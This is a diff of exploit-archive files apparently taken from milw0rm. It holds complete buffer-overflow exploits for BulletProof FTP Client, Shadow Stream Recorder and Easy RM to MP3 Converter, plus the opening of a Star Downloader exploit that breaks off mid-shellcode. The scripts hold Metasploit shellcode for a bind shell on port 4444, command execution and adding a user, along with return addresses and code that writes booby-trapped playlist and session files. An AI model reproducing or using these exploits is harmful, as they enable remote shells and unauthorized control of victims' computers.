-"\x6d\x6f\x64\x69\x66\x69\x65\x64\x20\x64\x69\x72\x65\x63\x74\x6c" -"\x79\x2e\x0d\x0a") - -exploit = "passwords.hotmail.com" -exploit += "\x90"*68 -exploit += "\x74\x06\x90\x90" #oplaa! 
-exploit += "\x98\x6A\xBF\x74" #oleacc.dll (xp sp2) -exploit += shellcode - -header2=( -"\x0a\x32\x31\x0d\x0a\x41\x42\x41\x42\x43\x0d\x0a\x62\x70\x68\x67\x71" -"\x64\x6e\x62\x6a\x6a\x67\x61\x65\x62\x0d\x0a\x63\x3a\x5c\x0d\x0a" -"\x2f\x0d\x0a") - -vuln = header1 + exploit + header2 - -try: - out_file = open("sploit.bps",'w') - out_file.write(vuln) - out_file.close() - print "\nSession file created!\n\nNow Go to: file>Load BP Session then chose it and clic Connect\n" -except: - print "Error!" - -# milw0rm.com [2009-04-13] +#!/usr/bin/python +#[*] Bug : BulletProof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH) +#[*] Credits : Stack +#[*] Tested on : Xp sp2 (fr) +#[*] Exploited by : His0k4 +#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com +#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D +#[*] translate by Cyb3r-1st: esse7 embe7 embou :D + +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +shellcode=( +"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x71" +"\x4f\xd8\x8d\x83\xeb\xfc\xe2\xf4\x8d\xa7\x9c\x8d\x71\x4f\x53\xc8" +"\x4d\xc4\xa4\x88\x09\x4e\x37\x06\x3e\x57\x53\xd2\x51\x4e\x33\xc4" +"\xfa\x7b\x53\x8c\x9f\x7e\x18\x14\xdd\xcb\x18\xf9\x76\x8e\x12\x80" +"\x70\x8d\x33\x79\x4a\x1b\xfc\x89\x04\xaa\x53\xd2\x55\x4e\x33\xeb" +"\xfa\x43\x93\x06\x2e\x53\xd9\x66\xfa\x53\x53\x8c\x9a\xc6\x84\xa9" +"\x75\x8c\xe9\x4d\x15\xc4\x98\xbd\xf4\x8f\xa0\x81\xfa\x0f\xd4\x06" +"\x01\x53\x75\x06\x19\x47\x33\x84\xfa\xcf\x68\x8d\x71\x4f\x53\xe5" +"\x4d\x10\xe9\x7b\x11\x19\x51\x75\xf2\x8f\xa3\xdd\x19\xbf\x52\x89" +"\x2e\x27\x40\x73\xfb\x41\x8f\x72\x96\x2c\xb9\xe1\x12\x4f\xd8\x8d") + +header1=( +"\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75\x6c\x6c\x65\x74" +"\x50\x72\x6f\x6f\x66\x20\x46\x54\x50\x20\x43\x6c\x69\x65\x6e\x74" +"\x20\x53\x65\x73\x73\x69\x6f\x6e\x2d\x46\x69\x6c\x65\x20\x61\x6e" +"\x64\x20\x73\x68\x6f\x75\x6c\x64\x20\x6e\x6f\x74\x20\x62\x65\x20" 
+"\x6d\x6f\x64\x69\x66\x69\x65\x64\x20\x64\x69\x72\x65\x63\x74\x6c"
+"\x79\x2e\x0d\x0a")
+
+exploit = "passwords.hotmail.com"
+exploit += "\x90"*68
+exploit += "\x74\x06\x90\x90" #oplaa!
+exploit += "\x98\x6A\xBF\x74" #oleacc.dll (xp sp2)
+exploit += shellcode
+
+header2=(
+"\x0a\x32\x31\x0d\x0a\x41\x42\x41\x42\x43\x0d\x0a\x62\x70\x68\x67\x71"
+"\x64\x6e\x62\x6a\x6a\x67\x61\x65\x62\x0d\x0a\x63\x3a\x5c\x0d\x0a"
+"\x2f\x0d\x0a")
+
+vuln = header1 + exploit + header2
+
+try:
+ out_file = open("sploit.bps",'w')
+ out_file.write(vuln)
+ out_file.close()
+ print "\nSession file created!\n\nNow Go to: file>Load BP Session then chose it and clic Connect\n"
+except:
+ print "Error!"
+
+# milw0rm.com [2009-04-13]
diff --git a/platforms/windows/local/8426.pl b/platforms/windows/local/8426.pl
index e2d5b1c59..f75f62fad 100755
--- a/platforms/windows/local/8426.pl
+++ b/platforms/windows/local/8426.pl
@@ -1,110 +1,110 @@ -#!/usr/bin/perl -# Shadow Stream Recorder (.m3u file) Local Universal Stack Overflow Exploit -# By AlpHaNiX [NullArea.Net] -# alpha[at]hacker.bz -# Made in Tunisia -########### -# program : Shadow Stream Recorder -# download : http://www.rm-to-mp3.net/downloads/ssrecordersetup.exe -# program homepage : http://www.mini-stream.net/shadow-stream-recorder/ -########## -# Exploit In Action : -#[!] usage : -# ./sploit.pl bindshell -# ./sploit.pl cmdexec -# ./sploit.pl adduser -########## -# C:\>sploit.pl bindshell -#[!] Done -# C:\>nc localhost 4444 -# Console - Windows Trust 3.0 (Service Pack 3: v5512) -# -#(C) 1985-2008 Microsoft Corp. -# Everything Tested Under Windows XP SP3 FR -# After Creating The File just open the program & drag and drop m3u evil file ! :) - - - -sub help {print "[!] usage : \n ./sploit.pl bindshell \n ./sploit.pl cmdexec \n ./sploit.pl adduser \n " ;exit();} - -&help -unless $ARGV[0]; - - -my $sploit = $ARGV[0]; -my $junk = "http://"."A" x 26117; -my $ret = "\x63\x46\x92\x7C"; -my $nope = "\x90" x 30; - - -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub , thanks metasploit -my $calc_shellcode = -"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9". -"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05". -"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09". -"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d". -"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26". -"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64". -"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb". -"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28". -"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44". -"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38". 
-"\xac\x2c\xc9\x40" ; - -# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com -my $bindshell = -"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x69". -"\x45\x3b\x07\x83\xeb\xfc\xe2\xf4\x95\x2f\xd0\x4a\x81\xbc\xc4\xf8". -"\x96\x25\xb0\x6b\x4d\x61\xb0\x42\x55\xce\x47\x02\x11\x44\xd4\x8c". -"\x26\x5d\xb0\x58\x49\x44\xd0\x4e\xe2\x71\xb0\x06\x87\x74\xfb\x9e". -"\xc5\xc1\xfb\x73\x6e\x84\xf1\x0a\x68\x87\xd0\xf3\x52\x11\x1f\x2f". -"\x1c\xa0\xb0\x58\x4d\x44\xd0\x61\xe2\x49\x70\x8c\x36\x59\x3a\xec". -"\x6a\x69\xb0\x8e\x05\x61\x27\x66\xaa\x74\xe0\x63\xe2\x06\x0b\x8c". -"\x29\x49\xb0\x77\x75\xe8\xb0\x47\x61\x1b\x53\x89\x27\x4b\xd7\x57". -"\x96\x93\x5d\x54\x0f\x2d\x08\x35\x01\x32\x48\x35\x36\x11\xc4\xd7". -"\x01\x8e\xd6\xfb\x52\x15\xc4\xd1\x36\xcc\xde\x61\xe8\xa8\x33\x05". -"\x3c\x2f\x39\xf8\xb9\x2d\xe2\x0e\x9c\xe8\x6c\xf8\xbf\x16\x68\x54". -"\x3a\x16\x78\x54\x2a\x16\xc4\xd7\x0f\x2d\x2a\x5b\x0f\x16\xb2\xe6". -"\xfc\x2d\x9f\x1d\x19\x82\x6c\xf8\xbf\x2f\x2b\x56\x3c\xba\xeb\x6f". -"\xcd\xe8\x15\xee\x3e\xba\xed\x54\x3c\xba\xeb\x6f\x8c\x0c\xbd\x4e". -"\x3e\xba\xed\x57\x3d\x11\x6e\xf8\xb9\xd6\x53\xe0\x10\x83\x42\x50". -"\x96\x93\x6e\xf8\xb9\x23\x51\x63\x0f\x2d\x58\x6a\xe0\xa0\x51\x57". -"\x30\x6c\xf7\x8e\x8e\x2f\x7f\x8e\x8b\x74\xfb\xf4\xc3\xbb\x79\x2a". -"\x97\x07\x17\x94\xe4\x3f\x03\xac\xc2\xee\x53\x75\x97\xf6\x2d\xf8". -"\x1c\x01\xc4\xd1\x32\x12\x69\x56\x38\x14\x51\x06\x38\x14\x6e\x56". -"\x96\x95\x53\xaa\xb0\x40\xf5\x54\x96\x93\x51\xf8\x96\x72\xc4\xd7". -"\xe2\x12\xc7\x84\xad\x21\xc4\xd1\x3b\xba\xeb\x6f\x99\xcf\x3f\x58". -"\x3a\xba\xed\xf8\xb9\x45\x3b\x07"; - - -# win32_adduser - PASS=alphanix EXITFUNC=seh USER=nullarea Size=244 Encoder=PexFnstenvSub http://metasploit.com -my $add_user = -"\x2b\xc9\x83\xe9\xc9\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xca". -"\x75\xb1\x0a\x83\xeb\xfc\xe2\xf4\x36\x9d\xf5\x0a\xca\x75\x3a\x4f". -"\xf6\xfe\xcd\x0f\xb2\x74\x5e\x81\x85\x6d\x3a\x55\xea\x74\x5a\x43". 
-"\x41\x41\x3a\x0b\x24\x44\x71\x93\x66\xf1\x71\x7e\xcd\xb4\x7b\x07".
-"\xcb\xb7\x5a\xfe\xf1\x21\x95\x0e\xbf\x90\x3a\x55\xee\x74\x5a\x6c".
-"\x41\x79\xfa\x81\x95\x69\xb0\xe1\x41\x69\x3a\x0b\x21\xfc\xed\x2e".
-"\xce\xb6\x80\xca\xae\xfe\xf1\x3a\x4f\xb5\xc9\x06\x41\x35\xbd\x81".
-"\xba\x69\x1c\x81\xa2\x7d\x5a\x03\x41\xf5\x01\x0a\xca\x75\x3a\x62".
-"\xf6\x2a\x80\xfc\xaa\x23\x38\xf2\x49\xb5\xca\x5a\xa2\x85\x3b\x0e".
-"\x95\x1d\x29\xf4\x40\x7b\xe6\xf5\x2d\x16\xdc\x6e\xe4\x10\xc9\x6f".
-"\xea\x5a\xd2\x2a\xa4\x10\xc5\x2a\xbf\x06\xd4\x78\xea\x1b\xc4\x66".
-"\xa6\x14\xc3\x6f\xab\x55\xd0\x66\xba\x1d\xd0\x64\xa3\x0d\x91\x25".
-"\x8b\x31\xf5\x2a\xec\x53\x91\x64\xaf\x01\x91\x66\xa5\x16\xd0\x66".
-"\xad\x07\xde\x7f\xba\x55\xf0\x6e\xa7\x1c\xdf\x63\xb9\x01\xc3\x6b".
-"\xbe\x1a\xc3\x79\xea\x1b\xc4\x66\xa6\x14\xc3\x6f\xab\x55\x9e\x4b".
-"\x8e\x31\xb1\x0a";
-
-if ($sploit eq 'bindshell')
-{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$bindshell;close(file);print "[!] Done \n";}
-
-elsif ($sploit eq 'cmdexec')
-{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$calc_shellcode;close(file);print "[!] Done \n"}
-
-elsif ($sploit eq 'adduser')
-{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$add_user;close(file);print "[!] Done \n"}
-
-else {&help}
-
-# milw0rm.com [2009-04-14]
+#!/usr/bin/perl
+# Shadow Stream Recorder (.m3u file) Local Universal Stack Overflow Exploit
+# By AlpHaNiX [NullArea.Net]
+# alpha[at]hacker.bz
+# Made in Tunisia
+###########
+# program : Shadow Stream Recorder
+# download : http://www.rm-to-mp3.net/downloads/ssrecordersetup.exe
+# program homepage : http://www.mini-stream.net/shadow-stream-recorder/
+##########
+# Exploit In Action :
+#[!] usage :
+# ./sploit.pl bindshell
+# ./sploit.pl cmdexec
+# ./sploit.pl adduser
+##########
+# C:\>sploit.pl bindshell
+#[!] Done
+# C:\>nc localhost 4444
+# Console - Windows Trust 3.0 (Service Pack 3: v5512)
+#
+#(C) 1985-2008 Microsoft Corp.
+# Everything Tested Under Windows XP SP3 FR +# After Creating The File just open the program & drag and drop m3u evil file ! :) + + + +sub help {print "[!] usage : \n ./sploit.pl bindshell \n ./sploit.pl cmdexec \n ./sploit.pl adduser \n " ;exit();} + +&help +unless $ARGV[0]; + + +my $sploit = $ARGV[0]; +my $junk = "http://"."A" x 26117; +my $ret = "\x63\x46\x92\x7C"; +my $nope = "\x90" x 30; + + +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub , thanks metasploit +my $calc_shellcode = +"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9". +"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05". +"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09". +"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d". +"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26". +"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64". +"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb". +"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28". +"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44". +"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38". +"\xac\x2c\xc9\x40" ; + +# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com +my $bindshell = +"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x69". +"\x45\x3b\x07\x83\xeb\xfc\xe2\xf4\x95\x2f\xd0\x4a\x81\xbc\xc4\xf8". +"\x96\x25\xb0\x6b\x4d\x61\xb0\x42\x55\xce\x47\x02\x11\x44\xd4\x8c". +"\x26\x5d\xb0\x58\x49\x44\xd0\x4e\xe2\x71\xb0\x06\x87\x74\xfb\x9e". +"\xc5\xc1\xfb\x73\x6e\x84\xf1\x0a\x68\x87\xd0\xf3\x52\x11\x1f\x2f". +"\x1c\xa0\xb0\x58\x4d\x44\xd0\x61\xe2\x49\x70\x8c\x36\x59\x3a\xec". +"\x6a\x69\xb0\x8e\x05\x61\x27\x66\xaa\x74\xe0\x63\xe2\x06\x0b\x8c". +"\x29\x49\xb0\x77\x75\xe8\xb0\x47\x61\x1b\x53\x89\x27\x4b\xd7\x57". +"\x96\x93\x5d\x54\x0f\x2d\x08\x35\x01\x32\x48\x35\x36\x11\xc4\xd7". 
+"\x01\x8e\xd6\xfb\x52\x15\xc4\xd1\x36\xcc\xde\x61\xe8\xa8\x33\x05". +"\x3c\x2f\x39\xf8\xb9\x2d\xe2\x0e\x9c\xe8\x6c\xf8\xbf\x16\x68\x54". +"\x3a\x16\x78\x54\x2a\x16\xc4\xd7\x0f\x2d\x2a\x5b\x0f\x16\xb2\xe6". +"\xfc\x2d\x9f\x1d\x19\x82\x6c\xf8\xbf\x2f\x2b\x56\x3c\xba\xeb\x6f". +"\xcd\xe8\x15\xee\x3e\xba\xed\x54\x3c\xba\xeb\x6f\x8c\x0c\xbd\x4e". +"\x3e\xba\xed\x57\x3d\x11\x6e\xf8\xb9\xd6\x53\xe0\x10\x83\x42\x50". +"\x96\x93\x6e\xf8\xb9\x23\x51\x63\x0f\x2d\x58\x6a\xe0\xa0\x51\x57". +"\x30\x6c\xf7\x8e\x8e\x2f\x7f\x8e\x8b\x74\xfb\xf4\xc3\xbb\x79\x2a". +"\x97\x07\x17\x94\xe4\x3f\x03\xac\xc2\xee\x53\x75\x97\xf6\x2d\xf8". +"\x1c\x01\xc4\xd1\x32\x12\x69\x56\x38\x14\x51\x06\x38\x14\x6e\x56". +"\x96\x95\x53\xaa\xb0\x40\xf5\x54\x96\x93\x51\xf8\x96\x72\xc4\xd7". +"\xe2\x12\xc7\x84\xad\x21\xc4\xd1\x3b\xba\xeb\x6f\x99\xcf\x3f\x58". +"\x3a\xba\xed\xf8\xb9\x45\x3b\x07"; + + +# win32_adduser - PASS=alphanix EXITFUNC=seh USER=nullarea Size=244 Encoder=PexFnstenvSub http://metasploit.com +my $add_user = +"\x2b\xc9\x83\xe9\xc9\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xca". +"\x75\xb1\x0a\x83\xeb\xfc\xe2\xf4\x36\x9d\xf5\x0a\xca\x75\x3a\x4f". +"\xf6\xfe\xcd\x0f\xb2\x74\x5e\x81\x85\x6d\x3a\x55\xea\x74\x5a\x43". +"\x41\x41\x3a\x0b\x24\x44\x71\x93\x66\xf1\x71\x7e\xcd\xb4\x7b\x07". +"\xcb\xb7\x5a\xfe\xf1\x21\x95\x0e\xbf\x90\x3a\x55\xee\x74\x5a\x6c". +"\x41\x79\xfa\x81\x95\x69\xb0\xe1\x41\x69\x3a\x0b\x21\xfc\xed\x2e". +"\xce\xb6\x80\xca\xae\xfe\xf1\x3a\x4f\xb5\xc9\x06\x41\x35\xbd\x81". +"\xba\x69\x1c\x81\xa2\x7d\x5a\x03\x41\xf5\x01\x0a\xca\x75\x3a\x62". +"\xf6\x2a\x80\xfc\xaa\x23\x38\xf2\x49\xb5\xca\x5a\xa2\x85\x3b\x0e". +"\x95\x1d\x29\xf4\x40\x7b\xe6\xf5\x2d\x16\xdc\x6e\xe4\x10\xc9\x6f". +"\xea\x5a\xd2\x2a\xa4\x10\xc5\x2a\xbf\x06\xd4\x78\xea\x1b\xc4\x66". +"\xa6\x14\xc3\x6f\xab\x55\xd0\x66\xba\x1d\xd0\x64\xa3\x0d\x91\x25". +"\x8b\x31\xf5\x2a\xec\x53\x91\x64\xaf\x01\x91\x66\xa5\x16\xd0\x66". +"\xad\x07\xde\x7f\xba\x55\xf0\x6e\xa7\x1c\xdf\x63\xb9\x01\xc3\x6b". 
+"\xbe\x1a\xc3\x79\xea\x1b\xc4\x66\xa6\x14\xc3\x6f\xab\x55\x9e\x4b".
+"\x8e\x31\xb1\x0a";
+
+if ($sploit eq 'bindshell')
+{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$bindshell;close(file);print "[!] Done \n";}
+
+elsif ($sploit eq 'cmdexec')
+{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$calc_shellcode;close(file);print "[!] Done \n"}
+
+elsif ($sploit eq 'adduser')
+{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$add_user;close(file);print "[!] Done \n"}
+
+else {&help}
+
+# milw0rm.com [2009-04-14]
diff --git a/platforms/windows/local/8427.py b/platforms/windows/local/8427.py
index 432f02def..994aefc0e 100755
--- a/platforms/windows/local/8427.py
+++ b/platforms/windows/local/8427.py
@@ -1,50 +1,50 @@ -#!/usr/bin/python -# Easy RM to MP3 Converter Universall Stack Overflow Exploit -# By Stack -# hihihi -# StaKer : Only Fabri Fibra :d -header = ( -"\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D" -"\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45" -"\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46" -"\x69\x6C\x65\x31\x3D") -junk = "\x41"*1244 -eip = "\xDB\x70\xBB\x01" # Universall Adress - # Abouts addres - # Executable modules, item 5 - # Base=01A20000 - # Size=0049D000 (4837376.) - # Entry=01B835B1 MSRMCu_3.<ModuleEntryPoint> - # Name=MSRMCu_3 - # Path=C:\Program Files\Easy RM to MP3 Converter\MSRMCutility04.dll - -nops = "\x90" * 20 -shellcode = ( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" -"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47" -"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38" -"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48" -"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" -"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58" -"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44" -"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38" -"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33" -"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47" -"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a" -"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b" -"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53" -"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57" 
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39" -"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46" -"\x4e\x46\x43\x36\x42\x50\x5a") -ex = header+junk+eip+nops+shellcode -file=open("Exploit.pls","w") -file.write(ex) -file.close() - -# milw0rm.com [2009-04-14] +#!/usr/bin/python +# Easy RM to MP3 Converter Universall Stack Overflow Exploit +# By Stack +# hihihi +# StaKer : Only Fabri Fibra :d +header = ( +"\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D" +"\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45" +"\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46" +"\x69\x6C\x65\x31\x3D") +junk = "\x41"*1244 +eip = "\xDB\x70\xBB\x01" # Universall Adress + # Abouts addres + # Executable modules, item 5 + # Base=01A20000 + # Size=0049D000 (4837376.) + # Entry=01B835B1 MSRMCu_3.<ModuleEntryPoint> + # Name=MSRMCu_3 + # Path=C:\Program Files\Easy RM to MP3 Converter\MSRMCutility04.dll + +nops = "\x90" * 20 +shellcode = ( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" +"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47" +"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38" +"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48" +"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" +"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58" +"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44" +"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38" +"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33" +"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47" 
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
+"\x4e\x46\x43\x36\x42\x50\x5a")
+ex = header+junk+eip+nops+shellcode
+file=open("Exploit.pls","w")
+file.write(ex)
+file.close()
+
+# milw0rm.com [2009-04-14]
diff --git a/platforms/windows/local/844.asm b/platforms/windows/local/844.asm
index bc76cbf5d..808336bd1 100755
--- a/platforms/windows/local/844.asm
+++ b/platforms/windows/local/844.asm
@@ -69,6 +69,6 @@ start:
 .ENDIF
 invoke RegCloseKey , TheReturn
 Invoke ExitProcess,0
-end start
-
-; milw0rm.com [2005-02-26]
+end start
+
+; milw0rm.com [2005-02-26]
diff --git a/platforms/windows/local/8444.cpp b/platforms/windows/local/8444.cpp
index 0cb187c7a..423c38898 100755
--- a/platforms/windows/local/8444.cpp
+++ b/platforms/windows/local/8444.cpp
@@ -1,111 +1,111 @@
-/*
- :::::::-. ... ::::::. :::.
- ;;, `';, ;; ;;;`;;;;, `;;;
- `[[ [[[[' [[[ [[[[[. '[[
- $$, $$$$ $$$ $$$ "Y$c$$
- 888_,o8P'88 .d888 888 Y88
- MMMMP"` "YmmMMMM"" MMM YM
- [ Discovered and Exploited by dun ]
-
-
- [ Star Downloader Free <= v1.45 ] (.dat) Universal SEH Overwrite Exploit
-
- Vendor: http://www.stardownloader.com
- Download: http://www.stardownloader.com/sdfree.exe
-
- Vuln:
- LocalFileName=A x 1398
-
- 1 run this expl( create file pwn.dat in "C:\Program Files\Star Downloader\Partial Downloads\" directory )
- 2 now run Star Downloader Free
- 3 .. ;0
-
- [ dun'at'strcpy.pl / 2009 ]
-*/
-
-
-#include <windows.h>
-#include <stdio.h>
-
-/*
-
-/SafeSEH OFF 0x10000000 0x10025000 1, 0, 0, 1 C:\Program Files\Star Downloader\NSHelper.dll
-
-C:\crack>Findjmp2.exe "C:\Program Files\Star Downloader\NSHelper.dll" EBX
-...
-0x100112C2 pop EBX - pop - ret
-...
-*/
-
-#define RET 0x100112C2 // pop-pop-ret
-#define JMP 0x909011EB // short jump (jmp 11)
-#define NOP 0x90
-#define LEN 1390+4+4+40+343
-
-
-char header1[] =
-"\x5B\x4F\x70\x74\x69\x6F\x6E\x73\x5D\x0A\x0A\x55\x52\x4C\x3D\x68"
-"\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D"
-"\x0A\x4C\x6F\x63\x61\x6C\x46\x69\x6C\x65\x4E\x61\x6D\x65\x3D";
-
-char header2[] =
-"\x0A\x53\x74\x61\x74\x75\x73\x3D\x53\x63\x68\x65\x64\x75\x6C\x65"
-"\x64\x0A\x46\x69\x6C\x65\x53\x69\x7A\x65\x3D\x30\x0A\x4E\x75\x6D"
-"\x4F\x66\x50\x61\x72\x74\x73\x3D\x2D\x31\x0A\x43\x61\x74\x65\x67"
-"\x6F\x72\x79\x3D\x0A\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E"
-"\x3D\x0A";
-
-// win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-char scode[] =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48"
